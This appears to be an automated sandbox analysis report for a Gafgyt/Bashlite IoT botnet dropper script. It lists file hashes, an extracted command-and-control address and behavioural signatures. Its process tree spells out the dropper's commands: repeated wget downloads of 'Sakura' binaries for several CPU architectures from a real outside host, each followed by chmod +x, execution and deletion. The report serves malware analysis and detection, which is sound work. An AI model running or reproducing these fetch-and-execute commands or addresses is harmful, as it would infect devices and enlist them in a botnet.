Analysis
-
max time kernel
20s -
max time network
21s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
10/03/2025, 02:27
General
-
Target
6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380.sh
-
Size
2KB
-
MD5
57f1041fd8cdcbb4c369bb68bfd99db8
-
SHA1
15df867f11dbdfc5500cd0b4a750ab5b0f861a92
-
SHA256
6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
-
SHA512
fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
Malware Config
Extracted
gafgyt
205.185.115.242:12345
Signatures
-
Detected Gafgyt variant 11 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 13 IoCs
-
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380.sh/tmp/6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380.sh1⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://45.135.194.28/m-i.p-s.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x m-i.p-s.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-i.p-s.Sakura./m-i.p-s.Sakura2⤵
-
-
/bin/rmrm -rf m-i.p-s.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/m-p.s-l.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x m-p.s-l.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-p.s-l.Sakura./m-p.s-l.Sakura2⤵
-
-
/bin/rmrm -rf m-p.s-l.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/s-h.4-.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x s-h.4-.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/s-h.4-.Sakura./s-h.4-.Sakura2⤵
-
-
/bin/rmrm -rf s-h.4-.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/x-8.6-.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x x-8.6-.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-8.6-.Sakura./x-8.6-.Sakura2⤵
-
-
/bin/rmrm -rf x-8.6-.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/a-r.m-6.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x a-r.m-6.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-6.Sakura./a-r.m-6.Sakura2⤵
-
-
/bin/rmrm -rf a-r.m-6.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/x-3.2-.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x x-3.2-.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-3.2-.Sakura./x-3.2-.Sakura2⤵
-
-
/bin/rmrm -rf x-3.2-.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/a-r.m-7.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x a-r.m-7.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-7.Sakura./a-r.m-7.Sakura2⤵
-
-
/bin/rmrm -rf a-r.m-7.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/p-p.c-.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/i-5.8-6.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x i-5.8-6.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/i-5.8-6.Sakura./i-5.8-6.Sakura2⤵
-
-
/bin/rmrm -rf i-5.8-6.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/m-6.8-k.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x m-6.8-k.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-6.8-k.Sakura./m-6.8-k.Sakura2⤵
-
-
/bin/rmrm -rf m-6.8-k.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/p-p.c-.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/a-r.m-4.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x a-r.m-4.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-4.Sakura./a-r.m-4.Sakura2⤵
-
-
/bin/rmrm -rf a-r.m-4.Sakura2⤵
-
-
/usr/bin/wgetwget http://45.135.194.28/a-r.m-5.Sakura2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x a-r.m-5.Sakura2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-5.Sakura./a-r.m-5.Sakura2⤵
-
-
/bin/rmrm -rf a-r.m-5.Sakura2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD567b1d4f29b5f3d4a34ca7fa7c6217505
SHA14877a85abdce3e675af243eaaa8fcc3463090a02
SHA2568beaa53cafbe16efa74a6197ff61ba31a5c4917bb4d7fc08a617bb2f68ddadca
SHA512c6dae24f9b3299f3c9534b19014bd9aaae71c57b9ef37517613fdfee44c48eebd7660a4f5394adaea8edbfec53aac5d508e67468a0372b1bb8f7092315096e2a
-
Filesize
118KB
MD5425fab3d1076fc2e2c7a2fac555bd1a2
SHA1cacd4c05abc4653c31e0a251e38bc144c7bb98c5
SHA256b8879c45463335061316f6ca8d318e0405ac5d099e973ba9fa92d17a6a618cd4
SHA51285922eb15be54a98e112a73de4a92b70bdd12703374d29383bde4913633edf4ec7cf2f88282976bc374f5b8a2bbce0ff039974159b0883d188e33ccec843c4f5
-
Filesize
91KB
MD5446fd508a7793319823d9ab6a49f763a
SHA1b5dd286ca11520a4af758d7644e48e7973ebb56e
SHA2560827430f0fac66f032a6b7d7683520a53bcae922c0604d9fd2443d8985224d9d
SHA5120e4d746b6f479d427b9f21fc702a68191d7633592823b9a5efc5e0c655dbeeb25a9682599b9d11538ba42099d53b403a28bc5f1d6d427c1627c7896710c07321
-
Filesize
96KB
MD5b17cb812f0f9f4f165aafb88d3095c1d
SHA107973fdd4580ded468e718dd9f760cf3ebd30546
SHA256becd8adb426f1b76dc3fc48adb19d7928cb007f6ae06fe857d468b86cf587d9d
SHA5123c40ef6ec0337d37f1bb21982c3d1e7e9b206f0cbb588c85260b0d94be1cc23c1a23cbb58487b624653ee2f01bf870b7737436f6b34f1d420a4b1b1b25cd8ef0
-
Filesize
157KB
MD5d3973e25e6731b45942245fd94e5122a
SHA19101514baa18a37d164043c12deacf393d955bee
SHA25614294bec7f615aefc954854c1ac6ceba550b8f5a654be3f9c05ad511f17bad0d
SHA51244a3bc3e97013d4d8b806905d8abc916c56055484a13798b5982bd288286c8a319bab51dfd84e6dbfa1d176e0e0f90e1939aae48162c1829b79996d460718401
-
Filesize
123KB
MD514d080085e07550462ad99c044f9a528
SHA18eb09b4d78b8f089198df54c1cbcb9b0b94c6065
SHA256fc7c954dbcc44830d87599ce3d0be7ef947bd3b59ef1d3d22fef2d107a043f12
SHA5127028652e0c50370014bb3377a1a0c201d77fcd541de59265df3729c5c74b1a18ba426e023493438fd8a56bddccc103f246432e33e02b47dd5f2e862ed4449fd8
-
Filesize
123KB
MD5f3713f7bb1b9f97832937880a8b5d31f
SHA165f2a9b5e56147042eed7ecf36ad08cbfa634a9d
SHA2560d343654edf5f6082a5eaba1b7812f3ff4822a3fc9a0b0da312ac1bfb93e877b
SHA5126ecac517f25818a82b5a7b7b50275c183b6adcd12b55e7d71b3fc45f6e7f6cc1cc40e9f61ee71de4a4f371e67373e855cfffa9a640392d322975682dede87978
-
Filesize
106KB
MD581673cf3472baef55f1fa7aae2cdfb50
SHA11aa9bb2cdab6acaa3d4ab05653c1580d038e4b59
SHA256782865aa08c1ad4ce7f360dc1d7bf32016515bd62f14fffc070f420046b38fac
SHA512ec2c4b67572d9f174c8d2a11775908e05706c7e83ec946fac5dc2a7339723b4f1becb5ad19e0645c0f87db055b78232ce42008f0567610eda503d385d2990f70
-
Filesize
86KB
MD50950c8ec59f79344ebdf0a95c274e243
SHA15ea0e8a96792b6693f8beaffc484328ff5292ebe
SHA256ed326f0a7e07ee9cd9fc472d08b0d1b4b8bd08075eaa7b53a1c7a55c50dcfda4
SHA512550b656c0d30ae7c59fd14d084eda037c97b38158f4f35399e7a372d99f9f5aaa5c7b5944da48bba45730f2e0e559ef7fda9bed5da7342ecb904ceff1fb8f130
-
Filesize
83KB
MD55facc88ccf81fbb0b6e7172a766f52c3
SHA12e6b245c95dcbe814ca6d5a2bf6bff90e0d06b6d
SHA256d496b895b3fd172325ffc99764043fd07e3275eaa29ef1b5adf3e86a7e173c21
SHA512225e4ec58b132ef264bce9adff18a72bbebf8b9d7d02869f1146c07ad3d45b17b83f177de34a4482da63a4767f7a963496be5e806a9536a020436359fdc6a76b
-
Filesize
92KB
MD5bc2f752972da249f2baa04d4b3ee7883
SHA15eeff86de4abc7a4e3c191ca48b520c9e43e925d
SHA256f310a921f4f8472f56e7d1cfea3dbf594e69015ff64f8c10b31caaaa15509ddb
SHA512644f0e997b94105be9d70b2981476b5fb184c4c16acc32275c13cf8add64f27fef8593a5b93d51698d3c592cbcf26b7363ceb87897c29ba35665bdb1262c27f1